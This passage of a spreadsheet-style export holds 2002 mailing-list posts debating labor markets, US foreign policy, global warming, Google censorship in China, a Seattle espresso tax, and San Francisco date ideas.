rum) and somehow allowed to vote . The union filed
 a grievance - which was denied - by a Minister of Labour, who, hey, 
guess what - used to be a VP at the company.
That's free labor markets at work. The business continues to prosper - 
as I was told when I was there -  it is a cash cow as long
as the JOA (Joint Operating Agreement) with the competing paper is in 
place.And if you think that any of those wonderful American companies, out of 
some free-enterprise belief in competing for the best talent,
are going to do anything about that, sorry, most of them received 
generous subsidies, in return, I'm sure, for an understanding about
the labor markets here.&gt;
&gt;BTW, if we ever actually *had* free markets in this country,
&gt;*including* the abolition of redistributive income and death taxes,
&gt;all those smart people in the Forbes 400 would have *more* money, and
&gt;there would be *more* self-made people on that list. In addition,
&gt;most of the people who *inherited* money on the list would have
&gt;*much* less of it, not even relatively speaking. Finally, practically
&gt;all of that "new" money would have come from economic efficiency and
&gt;not "stolen" from someone else, investment bubbles or not.
&gt;
&gt;That efficiency is called "progress", for those of you in The
&gt;People's Republics of Berkeley or Cambridge. It means more and better
&gt;stuff, cheaper, over time -- a terrible, petit-bourgeois concept
&gt;apparently not worthy of teaching by the educational elite, or you'd
&gt;know about it by now. In economic terms, it's also called an increase
&gt;in general welfare, and, no, Virginia, I'm not talking about
&gt;extorting money from someone who works, and giving it to someone who
&gt;doesn't in order to keep them from working and they can think of some
&gt;politician as Santa Claus come election time...
&gt;  
&gt;
Much as I like to accept what you say - I do believe in free markets , I 
have difficulty finding any - except of course for
labor markets, which governments go to great lengths to protect (well 
unless the supply is tight)
It was a great run with the technology industry - producing most of the 
self-made billionaires on
the list, but now we've got a government-sponsored monopoly, and the 
concept of "more stuff, cheaper"
which it has always promised - seems to be disappearing. A particularly 
galling example is
high-speed internet access. An article I read a couple of years ago that 
it is an area where the pricing
approaches of the IT industry (cheaper, better or you die) and the 
telecom industry (maintain your
monopoly through regulation, and get guaranteed price increases through 
the same regulators) meet.
Sadly to say, the telecom industry seems to have won. The whole 
entertainment industry/RIAA/Palladium thing
seems to be another instance where actually giving value to the customer 
seems less important than using
regulation to reduce competition and substitute products in order to 
produce profits for the favored few.&gt;
&gt;In short, then, economics is not a zero sum game, property is not
&gt;theft, the rich don't get rich off the backs of the poor, and
&gt;redistributionist labor "theory" of value happy horseshit is just
&gt;that: horseshit, happy or otherwise.
&gt;
&gt;To believe otherwise, is -- quite literally, given the time Marx
&gt;wrote Capital and the Manifesto -- romantic nonsense.
&gt;  
&gt;
I usually agree - but when there's a Republican in office -  I feel like 
they're the biggest believers in
the Manifesto, in reverse. Create a reserve pool of labor, reduce the 
rights of that "proletariat" you've
just created with bogus "law and order" policies , concentrate capital 
in the hands of a few (ideally people
who can get you reelected) and the economy will take care of itself. Oh, 
and lie - use
the word "compassionate" a lot. I guess I tend to believe that a certain 
amount of poverty reduction actually
helps a modern capitalist state - the basic economic tenet of the 
Republic party seems to be the more homeless under
 each overpass, the more efficient the rest of us will be.And the facts are, for most people in the Western world  are declining 
standards of living, declining benefits, disappearing social safety net,
greater working hours,  essentially since the entrance of women into the 
work force (not blaming women in any way, they have a right
 to work but its now 2 wage-earners in each family and still declining 
standards of living) is the reality.Again to quote that wonderfully liberal document I keep coming back to - 
the CIA world factbook - on the US economy:"Since 1975, practically all the gains in household income have gone to 
the top 20% of households"Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Hmm, if the shoe fits... I think these five attributes could more or 
less describe various actions of the US over the past decade or so...&gt; In the 1990s we witnessed the emergence of a small number of rogue 
&gt; states that, while different in important ways, share a number of 
&gt; attributes. These states:
&gt;
&gt; *    brutalize their own people and squander their national resources 
&gt; for the personal gain of the rulers;The first part of this doesn't really fit, except in isolated cases - 
certainly not en mass. The second part though... Hmm...&gt; *    display no regard for international law, threaten their 
&gt; neighbors, and callously violate international treaties to which they 
&gt; are party;Well, think about it.&gt; *    are determined to acquire weapons of mass destruction, along with 
&gt; other advanced military technology, to be used as threats or 
&gt; offensively to achieve the aggressive designs of these regimes; We already have weapons of mass destruction, but are actively developing 
bigger and better ones.&gt; *    sponsor terrorism around the globe; andHeheh... Anyone know about the 'School of the Americas'? What about the 
monies, supplies, and training that supported the contra rebels? Oh, I 
forgot, their government was "bad" and needed to be overthrown (with out 
help).&gt; *    reject basic human values and hate the United States and 
&gt; everything for which it stands.Basic human values like the first ammendment? The fourth ammendment?Sorry, Shrub, your political newspeak is falling on deaf ears. Oh, 
sorry, maybe I should self-censor my thoughts to avoid being put in a 
're-education camp' by Ashcrofts gestappo? Gads, maybe someone on FoRK 
has joined your T.I.P.S. program and became an official citizen spy?
In disgust,
Elias
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; *  Too much information?The saying, as I recall, is along
the lines of "put your best foot
forward".(In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Bonneville)&gt;           ... replied ... in one go, in a matter of minutes. I *do*
&gt; really think this way, complete with footnotes. So if it's too much
&gt; information, I still stand by my reply: I wouldn't be myself if I
&gt; started off playing games.Pascal could write short letters,
when he had the time.  Is editing
to provide an "executive summary"
really being untrue to yourself?(We are all used to a full-bore
real-time Rohit streaming, but
that's because we are already
"Friends of", and know to set
our buffers accordingly.  For a
stranger's sake, it may be best
to provide the "elevator pitch
Rohit" -- and negotiate upwards
only after a session has been
established)-Dave:::::Thomas Jefferson writes:
&gt; I served with General Washington in the legislature of Virginia before
&gt; the revolution and during it with Dr. Franklin in Congress. I never
&gt; heard either of them speak [for as long as] ten minutes at a time ...
</t>
  </si>
  <si>
    <t>&gt;
&gt; Sorry, Shrub, your political newspeak is falling on deaf ears. Oh, 
&gt; sorry, maybe I should self-censor my thoughts to avoid being put in a 
&gt; 're-education camp' by Ashcrofts gestappo? Gads, maybe someone on FoRK 
&gt; has joined your T.I.P.S. program and became an official citizen spy?
&gt;
&gt;
&gt; In disgust,
&gt; Elias
Well the message was clear to me - the US wants to start an arms race to 
jack up their world arms sales monopoly.Owen</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Gary Lawrence Murphy wrote:
&gt; &gt;and say hello to the cool:  Oooo ... /this/ is going to cause
&gt; some stir ...
&gt;
&gt; Of course not.  Some people just don't want to be confused by the facts.For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doesn't cover all the bases).- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jim Whitehead  writes:    J&gt; For anyone to fully bury global warming, they would need to
    J&gt; explain why the dramatic increase in CO2 concentrations are not
    J&gt; increasing the global temperature. They would also need to
    J&gt; explain why, worldwide, glaciers are melting faster than they
    J&gt; have previously in the historical record. The associated links cover that: The surface temperature in spots
frequented by people is warmer (hence all our groundbased sensors
reporting global warming) although the overall environmental
temperature is decreasing.Apparently, the real news is not that there is no global warming, but
that our models of the warming were seriously flawed by naive
convection models.  This too was not news to the theoreticians: All
that has happened is that NASA has confirmed the naiive convection
concerns.
-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t>"the historical record", by which you mean *human* historical record, is
highly overrated (nigh worthless) when you are talking about geological
timescales, even on topics with as short a timescale as climate.My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transient.For anyone to insist that the current negligible fluctuations are
anthropogenic just heaps one ridiculous assertion upon another.  I'll
just stick with Occam's Razor for now.In my humble opinion.Cheers,-James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t>
  </si>
  <si>
    <t xml:space="preserve">
For anyone to fully bury global warming, they would have to bury the
Greens.  A Green once said that if the Spotted Owl hadn't existed they
would have had to invent it.  So it is with global warming.  Their
fundamental opposition isn't to a warmer earth, it is to industrial
civilization.The fact that the sattelites didn't match what the global warming
theorists said should be there is old news.  The news here is that the
temperature measures via sattelite have gotten even better and they have
been validated with a different means of measurement.Rather than have to defend CO2 concentrations as not causing global
warming, people who believe in CO2 need a good explanation of the
"Medieval Warm Period".  Said period was warmer than what we have now,
and it obvioiusly wasn't caused by CO2.In point of fact the predicted global warming due to CO2 is not caused
DIRECTLY by CO2.  CO2 doesn't trap that much heat.  Water vapor does,
and if you can get more water vapor in the air due to CO2 then you have
your warming theory.Yet it would seem that the very stability of the earth's climate over
long periods argues not for an unstable system with positive feedback
loops but one where negative feedback loops predominate.More water vapor can increase temperatuers, but that also leads to more
clouds.  Clouds both trap heat and reflect it, so it depends a great
deal on how the cloud formation shakes out.  Most climate models admit
they do clouds very poorly.A good link is:
http://www.techcentralstation.be/2051/wrapper.jsp?PID=2051-100&amp;CID=2051-
060302A
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Jim
&gt; Whitehead
&gt; Sent: Monday, September 23, 2002 12:23 PM
&gt; To: Robert Harley; fork@spamassassin.taint.org
&gt; Subject: RE: Goodbye Global Warming
&gt; 
&gt; &gt; Gary Lawrence Murphy wrote:
&gt; &gt; &gt;and say hello to the cool:  Oooo ... /this/ is going to cause
&gt; &gt; some stir ...
&gt; &gt;
&gt; &gt; Of course not.  Some people just don't want to be confused by the
facts.
&gt; 
&gt; For anyone to fully bury global warming, they would need to explain
why
&gt; the
&gt; dramatic increase in CO2 concentrations are not increasing the global
&gt; temperature. They would also need to explain why, worldwide, glaciers
are
&gt; melting faster than they have previously in the historical record.
That
&gt; is,
&gt; people need more than refutations, they need a compelling alternate
&gt; explanation (hint: climate variability doesn't cover all the bases).
&gt; 
&gt; - Jim
&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;     J&gt; For anyone to fully bury global warming, they would need to
&gt;     J&gt; explain why the dramatic increase in CO2 concentrations are not
&gt;     J&gt; increasing the global temperature.You have not explained why the increase in CO2 concentrations is not
contributing to increasing global temperature.&gt; This too was not news to the theoreticians: All
&gt; that has happened is that NASA has confirmed the naiive convection
&gt; concerns.Precisely which theoreticians do you mean? What, exactly, do you mean by a
global warming theoretician -- scientists in this area don't use that term.I assure you that not all scientists performing modeling of global
temperature phenomena agree with your assertions.- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; "the historical record", by which you mean *human* historical record, is
&gt; highly overrated (nigh worthless) when you are talking about geological
&gt; timescales, even on topics with as short a timescale as climate.There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I don't see any compelling reason to "save
&gt; the glaciers" anyway, particularly in light of the fact that their
&gt; existence has always been transient.Most global climate change scientists would agree that temperatures in the
past have often been much warmer than today. The point of global warming
isn't to save the Earth -- the planet is not sentient. The point is to
understand and potentially reduce the impact of increasing temperatures on
global human activity.&gt; For anyone to insist that the current negligible fluctuations are
&gt; anthropogenic just heaps one ridiculous assertion upon another.  I'll
&gt; just stick with Occam's Razor for now.The increase in atmospheric CO2 concentration is due to human activity.It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Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message ----- 
From: "James Rogers" &gt;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years.Got bits?
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message ----- 
From: "John Hall" &gt; A Green once said that if the Spotted Owl hadn't existed they
&gt; would have had to invent it.  
A Republican once said "I am not a crook".
</t>
  </si>
  <si>
    <t xml:space="preserve">
--]&gt; A Green once said that if the Spotted Owl hadn't existed they
--]&gt; would have had to invent it.
--]A Republican once said "I am not a crook".
--]Oh great, another round of Lableisms....Let me know when you get back to
real data..
</t>
  </si>
  <si>
    <t>"I did not have sex with that woman."&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Mr.
&gt; FoRK
&gt; Sent: Monday, September 23, 2002 2:12 PM
&gt; To: FoRK
&gt; Subject: Re: Goodbye Global Warming
&gt; 
&gt; 
&gt; ----- Original Message -----
&gt; From: "John Hall" 
&gt; 
&gt; &gt; A Green once said that if the Spotted Owl hadn't existed they
&gt; &gt; would have had to invent it.
&gt; A Republican once said "I am not a crook".</t>
  </si>
  <si>
    <t xml:space="preserve">I've seen articles on this type of stuff passing through various forums
for several years.  I've always found archaeology interesting for no
particular reason.  Here is a recent article from U.S. News that I
actually still have in the dank recesses of my virtual repository.-James Rogers
 jamesr@best.com
--------------------------------------------
http://www.usnews.com/usnews/issue/020916/misc/16meltdown.htmDefrosting the pastAncient human and animal remains are melting out of glaciers, a bounty
of a warming worldBY ALEX MARKELSAs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"Knapp brought the skull to the Denver Museum of Nature and Science,
where scientists last month announced that it was indeed from a
bisonâ€“one that died about 340 years ago. "This was an extraordinary
discovery," says Russ Graham, the museum's chief curator, adding that it
could alter notions of the mountain environment centuries ago. "There's
probably a lot more like it yet to be found."And not just bison. Colorado isn't the only place where glaciers and
snowfields are melting. Decades of unusual warmth in regions from Peru
to Alaskaâ€“a trend some think is linked to emissions from cars and
industryâ€“have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mountains.Vanishing act. The trick is finding such specimens before Mother
Natureâ€“and lootersâ€“take them first. Once uncovered, frozen remains can
deteriorate within hours or be gnawed by animals. Moreover, they're
often so well preserved when they emerge that people who come upon them
don't even realize they're ancient.That was the case when three men hunting sheep near a high glacier in
British Columbia, Canada, three years ago saw what they thought was a
dead animal. "It looked a little like sealskin buried in the ice,"
recalls Warren Ward, a teacher from nearby Nelson. "But when I looked
closer I could see leather fringe from a coat and finger bones."Figuring they had found the remains of another hunter, or perhaps a fur
trapper, the men stowed a flint knife and other artifacts in a Zip-Loc
bag and delivered them to local officials. Archaeologists later exhumed
the fallen hunter's body, along with a woven hat, fur clothing, and what
seemed to be a medicine bag. Carbon dating revealed that the hunter
lived about 550 years ago. Dubbed Kwaday Dan Ts'inchi, or Long Ago
Person Found, by people of the Champagne and Aishihik First Nations (who
may be his direct descendants), he is perhaps the best-preserved human
from the period ever found in North America.Other findings from melting ice in the neighboring Yukon region could
explain what that long-ago person was doing in the mountains in the
first place. "Before this there was no archaeological record of people
living here," says Greg Hare, a Yukon government archaeologist. "Now we
see that this area was very much part of people's seasonal activities."Like Ward's discovery, the search began by chance, when Kristin Benedek
caught a whiff of what smelled like a barnyard as she and her husband,
Gerry Kuzyk, hunted sheep at 6,000 feet in the mountains of the south
Yukon. They followed the scent to a melting patch of ice covered in
caribou dung. "It was really odd, because I knew there hadn't been
caribou in the area for at least 100 years," recalls Kuzyk, then a
wildlife biologist with the Yukon government.Caribou cake. Returning a week later, he found "what looked like a
pencil with string wrapped around it." It turned out to be a
4,300-year-old atlatl, or spear thrower. Further investigation of the
ice patchâ€“and scores of others around the regionâ€“revealed icy layer
cakes filled with caribou remains and human detritus chronicling 7,800
years of changing hunting practices.Scientists now believe ancient caribou and other animals flocked to the
ice each summer to cool down and escape swarming mosquitoes and flies.
Hunters followed the game. They returned for centuries and discarded
some equipment in the ice. "We've got people hunting with throwing darts
up until 1,200 years ago," says Hare, who now oversees the research
project. "Then we see the first appearance of the bow and arrow about
1,300 years ago. And by 1,200 years ago, there's no more throwing
darts."Now scientists are trying to make the search less a matter of luck. They
are developing sophisticated computer models that combine data on where
glaciers are melting fastest and where humans and animals are known to
have migrated to pinpoint the best places to search in Alaska's Wrangell
and St. Elias mountain rangesâ€“the United States' most glaciated
terrainâ€“and in the Andes. Johan Reinhard thinks the fast- thawing
European Alps could also deliver more findings, perhaps as exquisite as
the Ice Man. "Global warming is providing us high-altitude
archaeologists with some fantastic opportunities right now. We're
probably about the only ones happy about it."
</t>
  </si>
  <si>
    <t xml:space="preserve">[a cheeky letter to the editors of the Economist follows, along with the 
article I was commenting on... Rohit]In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project.On second thought, I can hardly imagine this Administration *promoting* 
the use of encryption to uphold privacy rights. Never mind...Best,
   Rohit Khare===========================================================The search goes on
China backtracks on banning Googleâ€”up to a pointSep 19th 2002 | BEIJING
 From The Economist print editionIN CHINESE, the nickname for Google, an American Internet search engine, 
is gougou, meaning â€œdoggyâ€. For the country's fast-growing population of 
Internet users (46m, according to an official estimate), it is proving 
an elusive creature. Earlier this month, the Chinese authorities blocked 
access to Google from Internet service providers in Chinaâ€”apparently 
because the search engine helped Chinese users to get access to 
forbidden sites. Now, after an outcry from those users, access has been 
restored.An unusual climbdown by China's zealous Internet censors? Hardly. More 
sophisticated controls have now been imposed that make it difficult to 
use Google to search for material deemed offensive to the government. 
Access is still blocked to the cached versions of web pages taken by 
Google as it trawls the Internet. These once provided a handy way for 
Chinese users to see material stored on blocked websites.After the blocking of Google on August 31st, many Chinese Internet users 
posted messages on bulletin boards in China protesting against the move. 
Their anger was again aroused last week when some Chinese Internet 
providers began rerouting users trying to reach the blocked Google site 
to far less powerful search engines in China.Duncan Clark, the head of a Beijing-based technology consultancy firm, 
BDA (China) Ltd, says China is trying a new tactic in its efforts to 
censor the Internet. Until recently, it had focused on blocking 
individual sites, including all pages stored on them. Now it seems to be 
filtering data transmitted to or from foreign websites to search for key 
words that might indicate undesirable content. For example earlier this 
week when using Eastnet, a Beijing-based Internet provider, a search on 
Google for Falun Gongâ€”a quasi-Buddhist exercise sect outlawed in Chinaâ€”
usually aborted before all the results had time to appear. Such a search 
also rendered Google impossible to use for several minutes.
</t>
  </si>
  <si>
    <t xml:space="preserve">How about this:   A bored FoRKer said:  "YAWN"I believe Tom had it right.   Signal not noise.I'll start:
              Los Angeles Times September 23, 2002 Monday
                   Copyright 2002 / Los Angeles Times
                            Los Angeles TimesSeptember 23, 2002 Monday  Home Edition
SECTION: Main News Main News; Part 1; Page 13; National Desk
LENGTH: 1013 words
BYLINE: DANA CALVO, TIMES STAFF WRITER
DATELINE: SEATTLEBODY:The idea came at the end of a long, frustrating brown-bag session at a
public-policy think tank here.The challenge was to save the city's child-care programs. Staring into
his empty coffee cup, the meeting coordinator's mind landed on an
unlikely solution: Put a tax--just a "benign" dime a shot--on
espresso.That led to a petition signed by more than 20,000 Seattle residents,
and next year, voters will decide whether the tax becomes law, one
that taps right into Seattle's legendary addiction to coffee. This is,
after all, the town where Starbucks was born and where the $12 pound
of beans became a staple. There is one Starbucks for every 7,000
residents in Seattle, compared to one per 64,000 in New York. Seattle
also has two other major coffee chains, Tully's Coffee and Seattle's
Best Coffee, as well as countless cafes and espresso carts.A recent poll showed that 74% of Seattle residents would vote for the
tax. "For people outside of Seattle who don't understand the
consumption of espresso, [the tax proposal] can be seen as crazy,"
said John Burbank, the think tank's executive director, "but it was
common sense."Research by his nonprofit Economic Opportunity Institute showed that
people preferred a tax on liquor or beer over one on espresso. But
because of the large number of lattes and cappuccinos sold, a tax on
espresso could be lower than one levied on alcohol.Burbank estimates the tax could generate $7 million to $10 million a
year. City Council aides dispute his figures, saying their research
shows the tax would bring in $1.5 million to $3 million a year.Burbank's institute is funded by foundations and labor unions. The
think tank's mission is to promote public policy in the interests of
low-income people, and it has long championed child-care issues.Burbank says the tax would restore cuts to the child-care programs
made earlier this year by Gov. Gary Locke. He also says it would
provide more low-income families with subsidies for child care,
improve preschool programs and increase teacher salaries.At Bauhaus Books &amp; Coffee, the sidewalk is dotted with tables of
customers for whom coffee is a half-day activity, not just a drink.Espresso lovers like Chris Altman, who at a dime a day would spend an
extra $36.50 a year, said the investment is worth it. "I'm OK with
it," said the 35-year-old, stirring his iced latte. "The money's got
to come from somewhere."Hope Revuelto, 25, was cooling her regular coffee ($1 because she
brought her own mug) and reading "Zen and the Art of Pottery." She
supports the initiative and said its critics are behaving as would be
expected of espresso drinkers: They want the most expensive thing on
the menu but resist paying 10 cents to help the needy.Some say the tax isn't the issue; they just resent being singled out.David Marsh, 45, a costume manager, drinks up to three espressos a
day, which means he'd be shelling out an extra $109.50 a year. "I, for
one, don't have kids, but I drink espresso," he said, as he sewed a
leather collar onto a chain-mail tunic. "I don't mind paying, but I
think everyone should pay."Coffeehouses are steamed about it, and they've organized as
JOLT--Joined to Oppose the Latte Tax. Among the members are Seattle's
Chamber of Commerce and the city's two largest coffee franchises,
Starbucks and Tully's.The tax would force coffeehouses to track sales of any beverage that
contains espresso, a task that could be an administrative nightmare
for smaller cafes, especially during the frantic morning rush. If
espresso counts come under suspicion, coffeehouse owners could face a
city audit.University of Chicago economics professor Michael Greenstone said the tax doesn't add up. "The purpose of any tax is to be efficient and equitable, and this is
neither," he said. "On the efficiency side, it's surely going to lead
to costly efforts by both businesses and consumers to find ways to
avoid the tax. For example, Starbucks could claim that they are using
finely ground coffee, [instead of coffee run though an espresso maker]
and that consequently, they are exempt from the tax. Would they be
right? I don't know, but finding out will surely take lots of legal
fees that could have gone to child care."Of course, from a public-relations perspective, this is an ingenious
idea, and I mean that in a cynical way. They've pitted espresso
drinkers against child-care supporters, and who's going to side with
the espresso drinkers?"In fact, the proposed tax has forced opponents into a political
two-step, where their criticism must remain a beat behind their public
stance of political correctness. In a liberal city like Seattle,
corporations continually advertise their commitment to social
activism, and throughout the debate over the initiative, JOLT members
prefaced their opposition with endorsements of good child care."Starbucks will continue to support early-learning and
childhood-development programs through the millions of dollars we
contribute annually," the company said. "However, Starbucks does not
understand why the Economic Opportunity Institute would recommend an
additional consumer tax on espresso beverages, or any other single
consumer product."The City Council has yet to decide when the initiative will go before
voters next year. The initiative's authors say it is directed at
vendors; critics predict it will be passed on to consumers through
higher prices, effectively punishing them for their choice of coffee.
The tax would be applied to any drink with at least half an ounce of
espresso, including decaf. Drip coffee would be exempt.Burbank says the tax would reach only a pre-selected group of
consumers who are wealthier than those who drink drip. So, he's been
pitching it as a modern-day Robin Hood tax, where the needy get a dime
every time the affluent spend $3 to $4 on an espresso.It's the kind of political marketing that Fran Beulah, 43, finds
funny. "I drink espresso," she said, laughing, "and I am not rich."
JH&gt; "I did not have sex with that woman."&gt;&gt; -----Original Message-----
&gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
JH&gt; Mr.
&gt;&gt; FoRK
&gt;&gt; Sent: Monday, September 23, 2002 2:12 PM
&gt;&gt; To: FoRK
&gt;&gt; Subject: Re: Goodbye Global Warming
&gt;&gt; 
&gt;&gt; 
&gt;&gt; ----- Original Message -----
&gt;&gt; From: "John Hall" 
&gt;&gt; 
&gt;&gt; &gt; A Green once said that if the Spotted Owl hadn't existed they
&gt;&gt; &gt; would have had to invent it.
&gt;&gt; A Republican once said "I am not a crook".-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry... I just had a run-in with a neighbor whom I've never met before who
pigeonholed me within one minute after I asked a question - he said 'Are you
one of them environmentalists?' For some reason that narrowminded attitude
of not listening to what I was saying and categorizing me into a box in his
little paranoid republican fantasy world just pissed me off.Sheesh... I've been out of work too long...----- Original Message -----
From: "Tom" 
To: "Mr. FoRK" 
Cc: "FoRK" 
Sent: Monday, September 23, 2002 2:22 PM
Subject: Re: Goodbye Global Warming
&gt;
&gt; --]&gt; A Green once said that if the Spotted Owl hadn't existed they
&gt; --]&gt; would have had to invent it.
&gt; --]A Republican once said "I am not a crook".
&gt; --]
&gt;
&gt; Oh great, another round of Lableisms....Let me know when you get back to
&gt; real data..
&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: bitbitch@magnesium.net [mailto:bitbitch@magnesium.net]&gt; 
&gt; Burbank says the tax would reach only a pre-selected group of
&gt; consumers who are wealthier than those who drink drip. So, he's been
&gt; pitching it as a modern-day Robin Hood tax, where the needy get a dime
&gt; every time the affluent spend $3 to $4 on an espresso.The people who pour the espresso aren't rich.  An interesting issue
might be how it affects employment.Still, it is a 1% or less sales tax.  That might not make that big of a
difference.  The costs of tracking revenue and collecting the tax might be onerous.
Worse than the cost of the tax itself.Me: I hate coffee anyway.  But if they put a $.10/can tax on Diet Dr.
Pepper I might have to start buying them in Oregon.  (Yes, I drink that
much Diet Dr. Pepper).
</t>
  </si>
  <si>
    <t xml:space="preserve">I love the absurd sense of humor it takes to build up such an elaborate 
evening only to note that "even if the date's a bust you can always have 
a hundred people up for cocktails" in your penthouse suite at the end of 
the night :-)Personally, I'd put one point in favor of the Redwood Room over Lapis: 
on a weeknight, you can still whip out a TiBook and write, since it's a 
hotel bar. And it seems to give people all sorts of license to 
interrogate you as to why you're writing with a double of scotch :-)Best,
   Rohit&gt; Five Best Ways to Impress Your Date
&gt;
&gt; You've met the biped of your dreams at the corner laundromat and, 
&gt; wonder of wonders, she's agreed to go out with you this Saturday. Don't 
&gt; blow it! Follow the instructions below and even if you impress your 
&gt; date so much you never see her again, your evening will be a memorable 
&gt; one. All you need are a chauffeur, a change of clothes, and several 
&gt; hundred thousand dollars.
&gt;
&gt; Luxury Suite at Pacific Bell Park
&gt;
&gt; Third and King streets, 972-2000, www.sfgiants.com
&gt;
&gt; Kick off your date with an afternoon at the ballpark -- not just any 
&gt; ballpark, but just about the best ballpark in the country, and not in 
&gt; some drafty, behind-the-plate box seat but in one of the park's lushly 
&gt; accessorized luxury suites. An elevator whisks you from a private 
&gt; entrance on Willie Mays Plaza to your dwelling place above the infield. 
&gt; Besides the excellent views of the bay, the park, and the Giants in 
&gt; action, there's a balcony, a wet bar, a refrigerator, two televisions, 
&gt; a stereo/CD player, a dual-line phone, Internet access, room service, 
&gt; and a concierge to call you a cab or make your restaurant reservations 
&gt; for you. No one is admitted without proper clearance, ensuring your 
&gt; utmost privacy. Next: Pull yourself together for ...
&gt;
&gt; Cocktails at Lapis
&gt;
&gt; Pier 33 (Embarcadero at Bay), 982-0203,
&gt;
&gt; www.lapis-sf.com
&gt;
&gt; Now that the Redwood Room has devolved into just another velvet-rope 
&gt; yuppie hangout, the city has no clear-cut, top-of-the-line cocktail 
&gt; lounge such as Chicago's Pump Room or New York's King Cole Bar 
&gt; (although Maxfield's, the Compass Rose, and the Top of the Mark are 
&gt; excellent runners-up). Best of all is Lapis, where the wannabe Noel 
&gt; Coward can sip an estimable Gibson in the lounge adjoining the dining 
&gt; room. The dramatically backlit bar is framed by lush bronze draperies 
&gt; that complement the room's deep-blue setting, and towering ceilings 
&gt; give the lounge a graceful, airy ambience. Floor-to-ceiling windows 
&gt; provide a lush panorama of the bay and the hills beyond.
&gt;
&gt;
&gt; Dinner at the Dining Room
&gt;
&gt; Ritz-Carlton Hotel, 600 Stockton (between Pine and
&gt;
&gt; California), 296-7465, www.ritzcarlton.com
&gt;
&gt; Your next stop on the road to beguilement is one of the handsomest 
&gt; dining rooms in the country. The tranquil sounds of a harp underscore a 
&gt; sumptuous setting of polished mahogany, soft linens, and fine crystal 
&gt; gleaming in the candlelight. Chef Sylvain Portay prepares luxurious 
&gt; nouvelle cuisine in several courses: lobster salad with caviar cream; 
&gt; turbot with crayfish and truffles; roasted squab with port-marinated 
&gt; figs; saffron-poached pear with guanaja chocolate gratin. Sommelier 
&gt; StÃ©phane Lacroix maintains a fabulous cellar, the service is impeccable 
&gt; and inviting, and intimate discourse is practically inevitable. Next:
&gt;
&gt; Charter the Rendezvous From Rendezvous Charters
&gt;
&gt; Pier 40 (in South Beach Harbor), 543-7333,
&gt;
&gt; www.baysail.com
&gt;
&gt; Nothing's more enticing than an evening cruise around San Francisco 
&gt; Bay, and the islands, bridges, and lights of the city are especially 
&gt; entrancing viewed from this vintage brigantine schooner. Built in 1933 
&gt; and recently restored to its former glory, the 78-foot Rendezvous looks 
&gt; like a clipper ship out of the Gold Rush era, with its 80-foot masts 
&gt; and square-rigged sails. Intricately carved mahogany, pecan, ash, and 
&gt; rosewood accent the brass-railed, velvet-cushioned rooms below decks, 
&gt; the perfect spot for a sip of Veuve Cliquot and some subtle canoodling.
&gt;
&gt; Penthouse Suite at the Fairmont Hotel
&gt;
&gt; 950 Mason (between California and Sacramento),
&gt;
&gt; 772-5000, www.fairmont.com
&gt;
&gt; Last but not least, escort your companion to what has been described as 
&gt; the most expensive hotel accommodation in the world: the Fairmont's 
&gt; elaborate penthouse. The eight-room suite (including three bedrooms, 
&gt; three baths, a dining room, a library, a billiard room, a fully 
&gt; equipped kitchen, and a living room with fireplace and baby grand 
&gt; piano) comes with its own maid, butler, and limousine and is accessed 
&gt; by private elevator. The library alone is worth investigating: two 
&gt; circular floors of books encapsulated by a domed ceiling etched with 
&gt; the constellations. The view from the terrace is enthralling, and even 
&gt; if the date's a bust you can always have a hundred people up for 
&gt; cocktails.
&gt;
&gt; sfweekly.com | originally published: May 15, 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">
The further googlization of my screentimes....News...No not just
news...google news. I love the line that tells me how fresh/stale the news
item is....phreaking cewl.So far I like the content range.
</t>
  </si>
  <si>
    <t xml:space="preserve">The damn Federalists are at it again, another bumsrush on Oregons states
rights..[Being a 5 year translplant out here I say the best thing to do is bring
back the plans to make the state of Jefferson, then have Oregon,
Washington and Jefferson break away from the union.]http://www.cnn.com/2002/LAW/09/23/oregon.assisted.suicide/SAN FRANCISCO, California (CNN) -- The U.S.
Justice Department filed an appeal Monday to
overturn a federal judge's ruling that
upheld Oregon's doctor-assisted suicide law.A spokesman for Oregon Attorney General
Hardy Myers said the state views the appeal
as "same story, different day."Oregon voters approved doctor-assisted
suicide twice, in ballot initiatives in 1994
and 1997. But in November, U.S. Attorney
General John Ashcroft warned Oregon doctors
they would be prosecuted under federal law
if they prescribed lethal doses of drugs for
dying patients.
</t>
  </si>
  <si>
    <t xml:space="preserve">SF Weekly:
&gt;Nothing's more enticing than an evening cruise around San Francisco Bay, 
&gt;and the islands, bridges, and lights of the city are especially entrancing 
&gt;viewed from this vintage brigantine schooner. Built in 1933 and recently 
&gt;restored to its former glory, the 78-foot Rendezvous looks like a clipper 
&gt;ship out of the Gold Rush era, with its 80-foot masts and square-rigged 
&gt;sails.That sounds like fun. But it sets the wrong precedent.
Here's the better idea. Invite her for an afternoon
cruise under the Golden Gate bridge in your Stonehorse
day sailor. Under way, ask her if she'd like to take
the stick. Back at slip, cook her dinner. Something
simple, but good, maybe a stir fry or a stew, served
in the cockpit, with an inexpensive but potable wine.If she runs away after that, 'tis good riddance. If
she wants to try it again, another day, she shows
promise. If she asks you to show her the V berth, you
have a girlfriend. If she notes your brightwork needs
another coat, and asks what you're using on it,
propose on the spot.;-)
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx
</t>
  </si>
  <si>
